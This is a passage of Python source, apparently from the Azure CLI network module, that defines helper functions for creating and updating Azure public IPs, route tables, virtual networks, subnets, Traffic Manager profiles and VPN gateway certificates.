cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
            # look up the parent prefix (not the prefix being created) so it can be referenced
            prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_parent)
        except ResourceNotFoundError:
            raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_parent))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
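        # the service expects the progressive form, e.g. 'commission' -> 'Commissioning'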
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
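    # default allocation method: Standard SKU public IPs default to static, everything else to dynamic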
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
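    # HTTP probes need a monitor path; default to '/' when none is supplied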
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
    # TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 is fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
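    # optionally create an initial subnet in the same request; API 2018-08-01+ accepts multiple prefixes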
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None):
    # server-side validation reports a clear error message for invalid CIDRs,
    # so we don't validate on the client side
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
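    # route_table may be a full resource ID or a name in the given resource group;
    # an empty string clears the association and None leaves it untouched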
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
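    # insert or replace the subnet by name in the cached vnet and push a single update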
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
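    # probe with the first address of the vnet's first prefix; the service returns the available addresses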
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
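    # supplying two public IP addresses puts the gateway in active-active mode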
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
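    # any BGP option implicitly enables BGP on the gateway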
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
    # multiple authentication types (requires API version 2020-11-01 or later)
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
